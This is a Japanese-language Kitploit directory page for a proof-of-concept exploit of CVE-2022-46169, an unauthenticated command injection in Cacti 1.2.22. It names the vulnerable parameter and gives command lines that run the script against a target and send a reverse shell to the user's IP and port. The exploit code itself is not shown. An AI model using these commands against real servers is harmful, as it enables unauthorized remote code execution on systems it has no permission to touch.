Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-46169 — Cacti 1.2.22 に影響を与える CVE-2022-46169 の PoC | Kitploit
ツール/GitHubGitHub/devilgothies/cve-2022-46169
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubdevilgothies/cve-2022-46169

CVE-2022-46169

Cacti 1.2.22 に影響を与える CVE-2022-46169 の PoC

リポジトリを見る
3年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-46169 POC

これは、Cacti バージョン 1.2.22 に影響を与える CVE-2022-46169 脆弱性の概念実証 (POC) スクリプトです。

説明

CVE-2022-46169 脆弱性は、Cacti バージョン 1.2.22 までのバージョンにおいて、認証されていないコマンドインジェクションを許容し、www-data ユーザーとして認証されていないリモートコード実行を達成するものです。この脆弱性は、"remote_agent.php" ファイルの "host_id" パラメータにおけるユーザー入力の不適切な検証に起因します。

使用方法

root@kitploit:~
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>

<TARGET_URL> を対象の Cacti インストールの URL に、<YOUR_IP> をリバースシェルを受信するマシンの IP アドレスに、<YOUR_PORT> をリバースシェルを受信するポート番号に置き換えてください。

例:

root@kitploit:~
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337

免責事項

この POC スクリプトは教育目的のみです。自己責任で使用してください。このスクリプトの作成者は、このスクリプトの使用によって生じたいかなる損害に対しても責任を負いません。

参考文献

CVE-2022-46169 - 脆弱性の CVE エントリ。
Cacti セキュリティアドバイザリ (GitHub)

ツールをダウンロード